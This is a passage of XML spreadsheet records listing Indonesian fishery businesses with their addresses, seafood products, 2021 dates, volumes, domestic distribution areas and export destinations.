    <n v="24601"/>
    <x v="1059"/>
    <s v="KERIPIK CUMI NINA"/>
    <s v="Jl. Baturusa Desa Serandang, Kel. Baturusa, Kec. Merawang, Kabupaten Bangka&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Keripik Cumi"/>
    <d v="2021-04-05T00:00:00"/>
    <n v="1200"/>
    <s v="Kota Pangkal Pinang"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="24602"/>
    <x v="545"/>
    <s v="PT. SURI TANI PEMUKA"/>
    <s v="Dusun Sibaganding, Kel. Janggir Leto, Kec. Panei, Kabupaten Simalungun&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Barramundi, Kod, Doversole, Lencam, Kerapu, Kakap, Bawal, Pollack Alaska, Haddock)"/>
    <d v="2021-05-04T00:00:00"/>
    <n v="8500000"/>
    <m/>
    <s v="Canada, Indonesia, Singapore, United States"/>
  </r>
  <r>
    <n v="24610"/>
    <x v="687"/>
    <s v="PT. KARYA KENCANA SUMBER SARI"/>
    <s v="Jl. Raya Sumorame No.39, Kel. Sumorame, Kec. Candi, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerupuk Sotong"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24612"/>
    <x v="1060"/>
    <s v="UD. JAWA MADURA"/>
    <s v="Pergudangan Safe N Lock Blok O 1737 Jl. Lingkar Timur, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Swanggi, Gulama, Kerapu, Layur, Kakatua, Bawal, Kakap, Kurisi)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Timur, Kota Surabaya, Kota Denpasar, Kota Pontianak, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="24613"/>
    <x v="1060"/>
    <s v="UD. JAWA MADURA"/>
    <s v="Pergudangan Safe N Lock Blok O 1737 Jl. Lingkar Timur, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Salem, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="5000"/>
    <s v="Kabupaten Gresik, Kota Pasuruan, Kota Surabaya, Kota Pontianak, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="24614"/>
    <x v="1060"/>
    <s v="UD. JAWA MADURA"/>
    <s v="Pergudangan Safe N Lock Blok O 1737 Jl. Lingkar Timur, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="5000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="24615"/>
    <x v="1060"/>
    <s v="UD. JAWA MADURA"/>
    <s v="Pergudangan Safe N Lock Blok O 1737 Jl. Lingkar Timur, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kepiting Beku"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Timur, Kota Surabaya, Kota Palu, Kota Makassar, Kabupaten Sorong"/>
    <m/>
  </r>
  <r>
    <n v="24616"/>
    <x v="1060"/>
    <s v="UD. JAWA MADURA"/>
    <s v="Pergudangan Safe N Lock Blok O 1737 Jl. Lingkar Timur, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Gurami, Bandeng, Patin, Nila, Lele)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Timur, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Pontianak, Kota Makassar, Kabupaten Sorong"/>
    <m/>
  </r>
  <r>
    <n v="24617"/>
    <x v="1060"/>
    <s v="UD. JAWA MADURA"/>
    <s v="Pergudangan Safe N Lock Blok O 1737 Jl. Lingkar Timur, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Jakarta Timur, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Surabaya, Kota Pontianak, Kota Balikpapan, Kota Makassar, Kabupaten Sorong"/>
    <m/>
  </r>
  <r>
    <n v="24618"/>
    <x v="1061"/>
    <s v="PT. NESIA JAYA HUTAMA"/>
    <s v="Jl. Udang Blok M No.7 (Room 2), Kawasan Pelabuhan Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Daging Tuna Beku"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bekasi, Kota Depok, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24619"/>
    <x v="1061"/>
    <s v="PT. NESIA JAYA HUTAMA"/>
    <s v="Jl. Udang Blok M No.7 (Room 2), Kawasan Pelabuhan Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Lemadang, Cakalang, Tenggiri, Salem)"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Depok, Kota Tangerang"/>
    <s v="Oman, Thailand"/>
  </r>
  <r>
    <n v="24620"/>
    <x v="1061"/>
    <s v="PT. NESIA JAYA HUTAMA"/>
    <s v="Jl. Udang Blok M No.7 (Room 2), Kawasan Pelabuhan Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Bawal, Kerapu, Bawal, Kakap)"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bekasi, Kota Depok"/>
    <m/>
  </r>
  <r>
    <n v="24621"/>
    <x v="1061"/>
    <s v="PT. NESIA JAYA HUTAMA"/>
    <s v="Jl. Udang Blok M No.7 (Room 2), Kawasan Pelabuhan Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Depok, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="24622"/>
    <x v="1061"/>
    <s v="PT. NESIA JAYA HUTAMA"/>
    <s v="Jl. Udang Blok M No.7 (Room 2), Kawasan Pelabuhan Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Bekasi, Kota Depok, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24623"/>
    <x v="1031"/>
    <s v="CV. MULE JATI"/>
    <s v="Kampung Permas, Dusun Montong Agung, Kel. Pare Mas, Kec. Jerowaru, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Teripang Kering"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="6000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Mataram"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24624"/>
    <x v="1031"/>
    <s v="CV. MULE JATI"/>
    <s v="Kampung Permas, Dusun Montong Agung, Kel. Pare Mas, Kec. Jerowaru, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Kepiting Segar"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="1500"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Mataram"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24625"/>
    <x v="1062"/>
    <s v="PT. MEGASETIA AGUNG KIMIA"/>
    <s v="Jl. Rorotan IV No.189 RT 004 RW 010, Kel. Rorotan, Kec. Cilincing, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tepung Rumput Laut"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Timur, Kabupaten Bogor, Kabupaten Bekasi"/>
    <m/>
  </r>
  <r>
    <n v="24626"/>
    <x v="1062"/>
    <s v="PT. MEGASETIA AGUNG KIMIA"/>
    <s v="Jl. Rorotan IV No.189 RT 004 RW 010, Kel. Rorotan, Kec. Cilincing, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Minyak Hati Cod"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="4000"/>
    <s v="Kota Jakarta Timur, Kabupaten Bogor, Kabupaten Bekasi, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24627"/>
    <x v="1062"/>
    <s v="PT. MEGASETIA AGUNG KIMIA"/>
    <s v="Jl. Rorotan IV No.189 RT 004 RW 010, Kel. Rorotan, Kec. Cilincing, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tepung Alga Spirulina"/>
    <d v="2021-06-11T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Timur, Kabupaten Bogor, Kabupaten Bekasi"/>
    <m/>
  </r>
  <r>
    <n v="24628"/>
    <x v="1031"/>
    <s v="CV. MULE JATI"/>
    <s v="Kampung Permas, Dusun Montong Agung, Kel. Pare Mas, Kec. Jerowaru, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Demersal Segar (Kerapu, Barramundi, Kakap)"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Mataram"/>
    <s v="Brunei Darussalam, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24630"/>
    <x v="1063"/>
    <s v="FRANKY"/>
    <s v="Jl. Setia Budhi RT 004 RW 001, Kel. Sungai Lakam, Kec. Karimun, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Malong, Manyung, Anggoli, Kerapu, Gerot-gerot, Merah, Kaci-kaci, Kurau, Layur)"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="34986"/>
    <s v="Kabupaten Karimun"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24631"/>
    <x v="1063"/>
    <s v="FRANKY"/>
    <s v="Jl. Setia Budhi RT 004 RW 001, Kel. Sungai Lakam, Kec. Karimun, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Talang-talang, Tenggiri)"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="23324"/>
    <s v="Kabupaten Karimun"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24632"/>
    <x v="1064"/>
    <s v="ANDI"/>
    <s v="Jl. Kampung Baru No.74 RT 004 RW 002, Kel. Sungai Lakam Timur, Kec. Karimun, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Malong, Manyung, Anggoli, Kerapu, Layur, Kurau, Merah, Kaci-kaci)"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="57624"/>
    <s v="Kabupaten Karimun"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24633"/>
    <x v="1064"/>
    <s v="ANDI"/>
    <s v="Jl. Kampung Baru No.74 RT 004 RW 002, Kel. Sungai Lakam Timur, Kec. Karimun, Kabupaten Karimun&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Talang-talang, Tenggiri, Tongkol, Selar)"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="38416"/>
    <s v="Kabupaten Karimun"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24634"/>
    <x v="1065"/>
    <s v="POKLAHSAR IKAN BANDENG"/>
    <s v="Dusun Otasek, Kel. Tanjung, Kec. Pademawu, Kabupaten Pamekasan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Asap"/>
    <d v="2021-04-19T00:00:00"/>
    <n v="5000"/>
    <s v="Kabupaten Bangkalan, Kabupaten Sampang, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="24635"/>
    <x v="1066"/>
    <s v="PT. CAHAYA CEMERLANG"/>
    <s v="Jl. Prof. Dr. Ir. Sutami No.22, Kel. Tamalanrea, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tepung Karaginan"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="240000"/>
    <m/>
    <s v="Belgium, France"/>
  </r>
  <r>
    <n v="24636"/>
    <x v="1067"/>
    <s v="PT. AQUAFARM NUSANTARA"/>
    <s v="Jl. Dusun VII, Kel. Naga Kisar, Kec. Pantai Cermin, Kabupaten Serdang Bedagai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Fillet Nila Beku"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="28800000"/>
    <m/>
    <s v="Canada, Singapore, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24637"/>
    <x v="1067"/>
    <s v="PT. AQUAFARM NUSANTARA"/>
    <s v="Jl. Dusun VII, Kel. Naga Kisar, Kec. Pantai Cermin, Kabupaten Serdang Bedagai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Nila Bernilai Tambah Beku (Daging Perut Nila, Daging Dagu Nila, Tetelan Daging Nila, Kulit Nila, Sisik Nila, Tulang Dagu Nila)"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="7200000"/>
    <s v="Kota Medan, Kota Jakarta Pusat"/>
    <s v="Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24638"/>
    <x v="1067"/>
    <s v="PT. AQUAFARM NUSANTARA"/>
    <s v="Jl. Dusun VII, Kel. Naga Kisar, Kec. Pantai Cermin, Kabupaten Serdang Bedagai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Fillet Nila Segar"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="400000"/>
    <m/>
    <s v="Austria"/>
  </r>
  <r>
    <n v="24639"/>
    <x v="640"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) BENOA"/>
    <s v="Jl. Raya Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Lobster Hidup"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Sidoarjo, Kota Surabaya"/>
    <s v="Hong Kong, Japan, Singapore, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="24640"/>
    <x v="1068"/>
    <s v="KOPERASI MINA RIZKI ABADI"/>
    <s v="Jl, Alor Komplek PPI Oeba, Kel, Fatubesi, Kec, Kota Lama, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Lemuru, Deho, Lemadang, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-05-19T00:00:00"/>
    <n v="360000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="24641"/>
    <x v="1069"/>
    <s v="CV, BAURA"/>
    <s v="Jl, Raya Jati, Kel, Labuhan Lombok, Kec, Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Lemadang, Cakalang)"/>
    <d v="2021-04-22T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Jakarta Barat, Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24642"/>
    <x v="1069"/>
    <s v="CV, BAURA"/>
    <s v="Jl, Raya Jati, Kel, Labuhan Lombok, Kec, Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Pelagis Segar (Baby Tuna, Tongkol, Lemadang, Cakalang)"/>
    <d v="2021-04-22T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Barat, Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24643"/>
    <x v="1069"/>
    <s v="CV, BAURA"/>
    <s v="Jl, Raya Jati, Kel, Labuhan Lombok, Kec, Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Tuna Beku"/>
    <d v="2021-04-22T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Barat, Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24644"/>
    <x v="1069"/>
    <s v="CV, BAURA"/>
    <s v="Jl, Raya Jati, Kel, Labuhan Lombok, Kec, Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Tuna Segar"/>
    <d v="2021-04-22T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Barat, Kabupaten Banyuwangi, Kota Surabaya, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="24645"/>
    <x v="1070"/>
    <s v="KARDIM"/>
    <s v="Jl. Pelantar KUD No.98, Kel. Tanjungpinang, Kec. Tanjungpinang, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Mata Besar, Tongkol, Kembung, Selar, Tenggiri)"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Batam"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24646"/>
    <x v="1070"/>
    <s v="KARDIM"/>
    <s v="Jl. Pelantar KUD No.98, Kel. Tanjungpinang, Kec. Tanjungpinang, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Kerapu, Merah, Kaci-kaci, Kurisi, Ekor Kuning)"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Batam, Kota Tanjung Pinang"/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24647"/>
    <x v="1071"/>
    <s v="PT. SAMUDERA JAYA PERKASA"/>
    <s v="Jl. Raya Perancis, Pergudangan Mutiara Kosambi 1 Blok A5 No.5, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tuna Beku"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24648"/>
    <x v="1071"/>
    <s v="PT. SAMUDERA JAYA PERKASA"/>
    <s v="Jl. Raya Perancis, Pergudangan Mutiara Kosambi I Blok A5 No.5, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tuna Segar"/>
    <d v="2021-04-21T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24649"/>
    <x v="1072"/>
    <s v="PT. GRHA MINA WIJAYA"/>
    <s v="Jl. Kerta Dalem No.10, Kel. Sidakarya, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Udang Segar"/>
    <d v="2021-05-25T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Sidoarjo, Kota Surabaya"/>
    <s v="Australia, Cambodia, China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24650"/>
    <x v="1072"/>
    <s v="PT. GRHA MINA WIJAYA"/>
    <s v="Jl. Kerta Dalem No.10, Kel. Sidakarya, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kerang Segar"/>
    <d v="2021-05-25T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Sidoarjo, Kota Surabaya"/>
    <s v="Australia, Cambodia, China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24651"/>
    <x v="1072"/>
    <s v="PT. GRHA MINA WIJAYA"/>
    <s v="Jl. Kerta Dalem No.10, Kel. Sidakarya, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Makerel, Lemadang, Meka, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-05-25T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Sidoarjo, Kota Surabaya"/>
    <s v="Australia, Cambodia, China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24652"/>
    <x v="1072"/>
    <s v="PT. GRHA MINA WIJAYA"/>
    <s v="Jl. Kerta Dalem No.10, Kel. Sidakarya, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Segar (Katamba, Anggoli, Kerapu, Layur, Kakap, Ayam-ayam, Kurisi)"/>
    <d v="2021-05-25T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Sidoarjo, Kota Surabaya"/>
    <s v="Australia, Cambodia, China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24653"/>
    <x v="1072"/>
    <s v="PT. GRHA MINA WIJAYA"/>
    <s v="Jl. Kerta Dalem No.10, Kel. Sidakarya, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Makerel, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-05-25T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Sidoarjo, Kota Surabaya"/>
    <s v="Australia, Cambodia, China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24654"/>
    <x v="1072"/>
    <s v="PT. GRHA MINA WIJAYA"/>
    <s v="Jl. Kerta Dalem No.10, Kel. Sidakarya, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Beku (Kerapu, Layur, Kakap, Ayam-ayam, Kurisi)"/>
    <d v="2021-05-25T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Sidoarjo, Kota Surabaya"/>
    <s v="Australia, Cambodia, China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="24658"/>
    <x v="155"/>
    <s v="PT. KARYA MINA PUTRA"/>
    <s v="Dukuh Matalan, Kel. Purworejo, Kec. Kaliori, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Keong Beku"/>
    <d v="2021-04-16T00:00:00"/>
    <n v="80000"/>
    <m/>
    <s v="China, Viet Nam"/>
  </r>
  <r>
    <n v="24659"/>
    <x v="1073"/>
    <s v="BEREJO GALO ARO"/>
    <s v="Desa Aro RT 01, Kec. Muara Bulian, Kabupaten Batang Hari&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Kerupuk Ikan, Kerupuk Udang"/>
    <d v="2021-04-23T00:00:00"/>
    <n v="500"/>
    <s v="Kabupaten Batang Hari, Kota Jambi"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="24660"/>
    <x v="1073"/>
    <s v="BEREJO GALO ARO"/>
    <s v="Desa Aro RT 01, Kec. Muara Bulian, Kabupaten Batang Hari&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Stik Ikan"/>
    <d v="2021-04-23T00:00:00"/>
    <n v="400"/>
    <s v="Kabupaten Batang Hari, Kota Jambi"/>
    <m/>
  </r>
  <r>
    <n v="24661"/>
    <x v="1074"/>
    <s v="CV. HORIZON GROUP"/>
    <s v="Jl. Gatot Subroto No.108, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Tuna Loin Masak Beku"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="4000000"/>
    <m/>
    <s v="France, Spain, Thailand"/>
  </r>
  <r>
    <n v="24662"/>
    <x v="1074"/>
    <s v="CV. HORIZON GROUP"/>
    <s v="Jl. Gatot Subroto No.108, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Mata Besar, Bawal, Bream, Layur)"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="24663"/>
    <x v="1074"/>
    <s v="CV. HORIZON GROUP"/>
    <s v="Jl. Gatot Subroto No.108, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="2500"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="24664"/>
    <x v="1074"/>
    <s v="CV. HORIZON GROUP"/>
    <s v="Jl. Gatot Subroto No.108, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Cakalang, Barakuda)"/>
    <d v="2021-04-15T00:00:00"/>
    <n v="600000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Thailand"/>
  </r>
  <r>
    <n v="24665"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Central African Republic, China, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore, South Africa, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="24668"/>
    <x v="677"/>
    <s v="CV. JAVA FISH"/>
    <s v="Pergudangan Ritz Gate Blok BA-11, Jl. Muncul, Kel. Bohar, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Segar"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="24669"/>
    <x v="1075"/>
    <s v="PABRIK DUA SURYA ALAM TUNGGAL PT."/>
    <s v="Jl. Raya Tropoda Depan 126 B, Kel. Tropodo, Kec. Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2021-05-03T00:00:00"/>
